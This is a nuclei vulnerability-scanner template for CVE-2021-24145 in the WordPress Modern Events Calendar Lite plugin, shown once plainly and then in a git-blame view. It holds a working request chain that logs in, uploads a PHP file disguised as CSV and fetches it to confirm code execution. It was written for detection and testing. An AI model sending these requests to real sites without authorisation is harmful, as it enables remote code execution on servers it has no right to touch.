nuclei-templates/http/cves/2021/CVE-2021-24145.yaml

id: CVE-2021-24145

info:
  name: WordPress Modern Events Calendar Lite <5.16.5 - Authenticated Arbitrary File Upload
  author: theamanrawat
  severity: high
  description: |
    WordPress Modern Events Calendar Lite plugin before 5.16.5 is susceptible to authenticated arbitrary file upload. The plugin does not properly check the imported file, allowing PHP files to be uploaded and/or executed by an administrator or other high-privilege user using the text/csv content-type in the request. This can possibly lead to remote code execution.
  remediation: Fixed in version 5.16.5.
  reference:
    - https://wpscan.com/vulnerability/f42cc26b-9aab-4824-8168-b5b8571d1610
    - https://downloads.wordpress.org/plugin/modern-events-calendar-lite.5.15.5.zip
    - https://github.com/dnr6419/CVE-2021-24145
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24145
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 7.2
    cve-id: CVE-2021-24145
    cwe-id: CWE-434
    epss-score: 0.93499
    epss-percentile: 0.98858
    cpe: cpe:2.3:a:webnus:modern_events_calendar_lite:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: webnus
    product: modern_events_calendar_lite
    framework: wordpress
  tags: auth,wpscan,cve,wordpress,wp-plugin,wp,modern-events-calendar-lite,cve2021,rce,intrusive

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        POST /wp-admin/admin.php?page=MEC-ix&tab=MEC-import HTTP/1.1
        Host: {{Hostname}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
        Content-Type: multipart/form-data; boundary=---------------------------132370916641787807752589698875

        -----------------------------132370916641787807752589698875
        Content-Disposition: form-data; name="feed"; filename="{{randstr}}.php"
        Content-Type: text/csv

        <?php echo 'CVE-2021-24145'; ?>

        -----------------------------132370916641787807752589698875
        Content-Disposition: form-data; name="mec-ix-action"

        import-start-bookings
        -----------------------------132370916641787807752589698875--
      - |
        GET /wp-content/uploads/{{randstr}}.php HTTP/1.1
        Host: {{Hostname}}

    cookie-reuse: true
    req-condition: true

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - contains(header_3, "text/html")
          - status_code_3 == 200
          - contains(body_3, 'CVE-2021-24145')
        condition: and

# digest: 4b0a00483046022100f75b4ae9d748b3a3f22d8b5c504726e144fb86dbab68f4cea2c68a9c6c4cb358022100d1ec89fff937547d9e4ccdf36330a3be5f551e2d99cab4f394f59f059aca011b:922c64590222798bb761d5b6d8e72950
templates added 2023-03-05 13:42:10 +00:00			`id: CVE-2021-24145`

			`info:`
Dashboard Content Enhancements (#6965) * Add description and enhance one where the UI failed to save properly. dos2unix on a template * Change cvedetails link to nvd * make severities match * Enhancement: cves/2015/CVE-2015-2863.yaml by md * Enhancement: cves/2017/CVE-2017-14524.yaml by md * Enhancement: cves/2017/CVE-2017-5638.yaml by md * Enhancement: cves/2019/CVE-2019-16759.yaml by md * Enhancement: cves/2021/CVE-2021-22986.yaml by md * Enhancement: cves/2021/CVE-2021-24145.yaml by md * Enhancement: cves/2021/CVE-2021-24145.yaml by md * Enhancement: cves/2021/CVE-2021-24155.yaml by md * Enhancement: cves/2021/CVE-2021-24145.yaml by md * Enhancement: cves/2021/CVE-2021-24145.yaml by md * Enhancement: cves/2021/CVE-2021-24347.yaml by md * Enhancement: cves/2021/CVE-2021-25003.yaml by md * Enhancement: cves/2021/CVE-2021-25296.yaml by md * Enhancement: cves/2021/CVE-2021-25297.yaml by md * Enhancement: cves/2021/CVE-2021-25296.yaml by md * Enhancement: cves/2021/CVE-2021-25297.yaml by md * Enhancement: cves/2021/CVE-2021-25298.yaml by md * Enhancement: cves/2021/CVE-2021-25297.yaml by md * Enhancement: cves/2021/CVE-2021-28151.yaml by md * Enhancement: cves/2021/CVE-2021-30128.yaml by md * Enhancement: cves/2022/CVE-2022-0824.yaml by md * Enhancement: cves/2022/CVE-2022-0824.yaml by md * Enhancement: cves/2022/CVE-2022-0885.yaml by md * Enhancement: cves/2022/CVE-2022-21587.yaml by md * Enhancement: cves/2022/CVE-2022-2314.yaml by md * Enhancement: cves/2022/CVE-2022-24816.yaml by md * Enhancement: cves/2022/CVE-2022-31499.yaml by md * Enhancement: cves/2022/CVE-2022-21587.yaml by md * Enhancement: cves/2021/CVE-2021-24155.yaml by md * Enhancement: cves/2017/CVE-2017-5638.yaml by md * Enhancement: cves/2015/CVE-2015-2863.yaml by md * Enhancement: cves/2022/CVE-2022-33901.yaml by md * Enhancement: cves/2022/CVE-2022-2314.yaml by md * Enhancement: cves/2022/CVE-2022-33901.yaml by md * Enhancement: cves/2022/CVE-2022-34753.yaml by md * Enhancement: cves/2022/CVE-2022-39952.yaml by md * Enhancement: cves/2022/CVE-2022-4060.yaml by md * Enhancement: cves/2022/CVE-2022-44877.yaml by md * Enhancement: cves/2023/CVE-2023-0669.yaml by md * Enhancement: cves/2023/CVE-2023-26255.yaml by md * Enhancement: cves/2023/CVE-2023-26256.yaml by md * Enhancement: exposures/files/salesforce-credentials.yaml by md * Enhancement: misconfiguration/hadoop-unauth-rce.yaml by md * Enhancement: misconfiguration/installer/nopcommerce-installer.yaml by md * Enhancement: network/backdoor/backdoored-zte.yaml by md * Enhancement: network/detection/ibm-d2b-database-server.yaml by md * Enhancement: network/detection/ibm-d2b-database-server.yaml by md * Enhancement: technologies/oracle/oracle-atg-commerce.yaml by md * Enhancement: token-spray/api-abuseipdb.yaml by md * Enhancement: token-spray/api-abuseipdb.yaml by md * Enhancement: token-spray/api-dbt.yaml by md * Enhancement: vulnerabilities/avaya/avaya-aura-rce.yaml by md * Enhancement: vulnerabilities/avaya/avaya-aura-xss.yaml by md * Enhancement: vulnerabilities/cisco/cisco-cloudcenter-suite-rce.yaml by md * Enhancement: vulnerabilities/froxlor-xss.yaml by md * Enhancement: vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml by md * Enhancement: vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml by md * Enhancement: vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml by md * Enhancement: vulnerabilities/opencpu/opencpu-rce.yaml by md * Enhancement: vulnerabilities/other/academy-lms-xss.yaml by md * Enhancement: vulnerabilities/other/caucho-resin-info-disclosure.yaml by md * Enhancement: vulnerabilities/other/ckan-dom-based-xss.yaml by md * Enhancement: vulnerabilities/other/couchdb-adminparty.yaml by md * Enhancement: vulnerabilities/other/graylog-log4j.yaml by md * Enhancement: vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml by md * Initial cleanups for syntax errors * dashboard gremlins * Add log4j back to name * Enhancement: exposures/files/salesforce-credentials.yaml by cs * Enhancement: misconfiguration/installer/nopcommerce-installer.yaml by cs * Enhancement: network/backdoor/backdoored-zte.yaml by cs * Enhancement: vulnerabilities/other/couchdb-adminparty.yaml by cs * Sev and other info tweaks * Merge conflict --------- Co-authored-by: sullo <sullo@cirt.net> 2023-03-27 17:46:47 +00:00			`name: WordPress Modern Events Calendar Lite <5.16.5 - Authenticated Arbitrary File Upload`
templates added 2023-03-05 13:42:10 +00:00			`author: theamanrawat`
			`severity: high`
			`description: \|`
Dashboard Content Enhancements (#6965) * Add description and enhance one where the UI failed to save properly. dos2unix on a template * Change cvedetails link to nvd * make severities match * Enhancement: cves/2015/CVE-2015-2863.yaml by md * Enhancement: cves/2017/CVE-2017-14524.yaml by md * Enhancement: cves/2017/CVE-2017-5638.yaml by md * Enhancement: cves/2019/CVE-2019-16759.yaml by md * Enhancement: cves/2021/CVE-2021-22986.yaml by md * Enhancement: cves/2021/CVE-2021-24145.yaml by md * Enhancement: cves/2021/CVE-2021-24145.yaml by md * Enhancement: cves/2021/CVE-2021-24155.yaml by md * Enhancement: cves/2021/CVE-2021-24145.yaml by md * Enhancement: cves/2021/CVE-2021-24145.yaml by md * Enhancement: cves/2021/CVE-2021-24347.yaml by md * Enhancement: cves/2021/CVE-2021-25003.yaml by md * Enhancement: cves/2021/CVE-2021-25296.yaml by md * Enhancement: cves/2021/CVE-2021-25297.yaml by md * Enhancement: cves/2021/CVE-2021-25296.yaml by md * Enhancement: cves/2021/CVE-2021-25297.yaml by md * Enhancement: cves/2021/CVE-2021-25298.yaml by md * Enhancement: cves/2021/CVE-2021-25297.yaml by md * Enhancement: cves/2021/CVE-2021-28151.yaml by md * Enhancement: cves/2021/CVE-2021-30128.yaml by md * Enhancement: cves/2022/CVE-2022-0824.yaml by md * Enhancement: cves/2022/CVE-2022-0824.yaml by md * Enhancement: cves/2022/CVE-2022-0885.yaml by md * Enhancement: cves/2022/CVE-2022-21587.yaml by md * Enhancement: cves/2022/CVE-2022-2314.yaml by md * Enhancement: cves/2022/CVE-2022-24816.yaml by md * Enhancement: cves/2022/CVE-2022-31499.yaml by md * Enhancement: cves/2022/CVE-2022-21587.yaml by md * Enhancement: cves/2021/CVE-2021-24155.yaml by md * Enhancement: cves/2017/CVE-2017-5638.yaml by md * Enhancement: cves/2015/CVE-2015-2863.yaml by md * Enhancement: cves/2022/CVE-2022-33901.yaml by md * Enhancement: cves/2022/CVE-2022-2314.yaml by md * Enhancement: cves/2022/CVE-2022-33901.yaml by md * Enhancement: cves/2022/CVE-2022-34753.yaml by md * Enhancement: cves/2022/CVE-2022-39952.yaml by md * Enhancement: cves/2022/CVE-2022-4060.yaml by md * Enhancement: cves/2022/CVE-2022-44877.yaml by md * Enhancement: cves/2023/CVE-2023-0669.yaml by md * Enhancement: cves/2023/CVE-2023-26255.yaml by md * Enhancement: cves/2023/CVE-2023-26256.yaml by md * Enhancement: exposures/files/salesforce-credentials.yaml by md * Enhancement: misconfiguration/hadoop-unauth-rce.yaml by md * Enhancement: misconfiguration/installer/nopcommerce-installer.yaml by md * Enhancement: network/backdoor/backdoored-zte.yaml by md * Enhancement: network/detection/ibm-d2b-database-server.yaml by md * Enhancement: network/detection/ibm-d2b-database-server.yaml by md * Enhancement: technologies/oracle/oracle-atg-commerce.yaml by md * Enhancement: token-spray/api-abuseipdb.yaml by md * Enhancement: token-spray/api-abuseipdb.yaml by md * Enhancement: token-spray/api-dbt.yaml by md * Enhancement: vulnerabilities/avaya/avaya-aura-rce.yaml by md * Enhancement: vulnerabilities/avaya/avaya-aura-xss.yaml by md * Enhancement: vulnerabilities/cisco/cisco-cloudcenter-suite-rce.yaml by md * Enhancement: vulnerabilities/froxlor-xss.yaml by md * Enhancement: vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml by md * Enhancement: vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml by md * Enhancement: vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml by md * Enhancement: vulnerabilities/opencpu/opencpu-rce.yaml by md * Enhancement: vulnerabilities/other/academy-lms-xss.yaml by md * Enhancement: vulnerabilities/other/caucho-resin-info-disclosure.yaml by md * Enhancement: vulnerabilities/other/ckan-dom-based-xss.yaml by md * Enhancement: vulnerabilities/other/couchdb-adminparty.yaml by md * Enhancement: vulnerabilities/other/graylog-log4j.yaml by md * Enhancement: vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml by md * Initial cleanups for syntax errors * dashboard gremlins * Add log4j back to name * Enhancement: exposures/files/salesforce-credentials.yaml by cs * Enhancement: misconfiguration/installer/nopcommerce-installer.yaml by cs * Enhancement: network/backdoor/backdoored-zte.yaml by cs * Enhancement: vulnerabilities/other/couchdb-adminparty.yaml by cs * Sev and other info tweaks * Merge conflict --------- Co-authored-by: sullo <sullo@cirt.net> 2023-03-27 17:46:47 +00:00			`WordPress Modern Events Calendar Lite plugin before 5.16.5 is susceptible to authenticated arbitrary file upload. The plugin does not properly check the imported file, allowing PHP files to be uploaded and/or executed by an administrator or other high-privilege user using the text/csv content-type in the request. This can possibly lead to remote code execution.`
Updated 2021 CVEs 2023-09-06 12:09:01 +00:00			`remediation: Fixed in version 5.16.5.`
templates added 2023-03-05 13:42:10 +00:00			`reference:`
			`- https://wpscan.com/vulnerability/f42cc26b-9aab-4824-8168-b5b8571d1610`
			`- https://downloads.wordpress.org/plugin/modern-events-calendar-lite.5.15.5.zip`
			`- https://github.com/dnr6419/CVE-2021-24145`
			`- https://nvd.nist.gov/vuln/detail/CVE-2021-24145`
			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H`
			`cvss-score: 7.2`
			`cve-id: CVE-2021-24145`
			`cwe-id: CWE-434`
TemplateMan Update [Mon Oct 23 12:22:19 UTC 2023] :robot: 2023-10-23 12:22:20 +00:00			`epss-score: 0.93499`
TemplateMan Update [Thu Nov 9 06:04:51 UTC 2023] :robot: 2023-11-09 06:04:52 +00:00			`epss-percentile: 0.98858`
Updated 2021 CVEs 2023-09-06 12:09:01 +00:00			`cpe: cpe:2.3:a:webnus:modern_events_calendar_lite::::::wordpress::*`
templates added 2023-03-05 13:42:10 +00:00			`metadata:`
boolean format update 2023-06-04 08:13:42 +00:00			`verified: true`
Updated 2021 CVEs 2023-09-06 12:09:01 +00:00			`max-request: 3`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`vendor: webnus`
			`product: modern_events_calendar_lite`
Updated 2021 CVEs 2023-09-06 12:09:01 +00:00			`framework: wordpress`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`tags: auth,wpscan,cve,wordpress,wp-plugin,wp,modern-events-calendar-lite,cve2021,rce,intrusive`
templates added 2023-03-05 13:42:10 +00:00
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
templates added 2023-03-05 13:42:10 +00:00			`- raw:`
			`- \|`
			`POST /wp-login.php HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`

			`log={{username}}&pwd={{password}}&wp-submit=Log+In`
			`- \|`
			`POST /wp-admin/admin.php?page=MEC-ix&tab=MEC-import HTTP/1.1`
			`Host: {{Hostname}}`
			`Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8`
			`Content-Type: multipart/form-data; boundary=---------------------------132370916641787807752589698875`

			`-----------------------------132370916641787807752589698875`
			`Content-Disposition: form-data; name="feed"; filename="{{randstr}}.php"`
			`Content-Type: text/csv`

			`<?php echo 'CVE-2021-24145'; ?>`

			`-----------------------------132370916641787807752589698875`
			`Content-Disposition: form-data; name="mec-ix-action"`

			`import-start-bookings`
			`-----------------------------132370916641787807752589698875--`
			`- \|`
			`GET /wp-content/uploads/{{randstr}}.php HTTP/1.1`
			`Host: {{Hostname}}`

			`cookie-reuse: true`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`req-condition: true`

templates added 2023-03-05 13:42:10 +00:00			`matchers-condition: and`
			`matchers:`
			`- type: dsl`
			`dsl:`
removed deprecated header syntax with latest one 2023-06-19 21:10:30 +00:00			`- contains(header_3, "text/html")`
templates added 2023-03-05 13:42:10 +00:00			`- status_code_3 == 200`
			`- contains(body_3, 'CVE-2021-24145')`
			`condition: and`
TemplateMan Update [Tue Nov 7 17:58:21 UTC 2023] :robot: 2023-11-07 17:58:22 +00:00
			`# digest: 4b0a00483046022100f75b4ae9d748b3a3f22d8b5c504726e144fb86dbab68f4cea2c68a9c6c4cb358022100d1ec89fff937547d9e4ccdf36330a3be5f551e2d99cab4f394f59f059aca011b:922c64590222798bb761d5b6d8e72950`